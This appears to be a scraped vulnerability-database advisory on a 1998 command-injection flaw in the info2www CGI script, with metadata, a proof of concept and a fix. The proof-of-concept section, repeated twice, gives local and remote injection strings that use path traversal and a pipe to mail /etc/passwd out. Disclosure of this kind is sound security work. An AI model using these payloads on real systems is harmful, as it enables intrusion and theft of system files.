Info2www CGI Input Handling Vulnerability
BID:1995
Info
Info2www CGI Input Handling Vulnerability
| Bugtraq ID: | 1995 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Mar 03 1998 12:00AM |
| Updated: | Mar 03 1998 12:00AM |
| Credit: | This issue was first posted to BugTraq on March 3, 1998 by Niall Smart < [email protected] > |
| Vulnerable: |
Roar Smith info2www 1.1 Roar Smith info2www 1.0 |
| Not Vulnerable: |
Roar Smith info2www 1.2 |
Exploit / POC
Info2www CGI Input Handling Vulnerability
Locally:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)'
$
You have new mail.
$
Remotely:
http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|)
Locally:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)'
$
You have new mail.
$
Remotely:
http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|)
Solution / Fix
Info2www CGI Input Handling Vulnerability
Solution:
Version 1.2 of the script does not suffer from this issue.
Solution:
Version 1.2 of the script does not suffer from this issue.
References
Info2www CGI Input Handling Vulnerability
References:
References: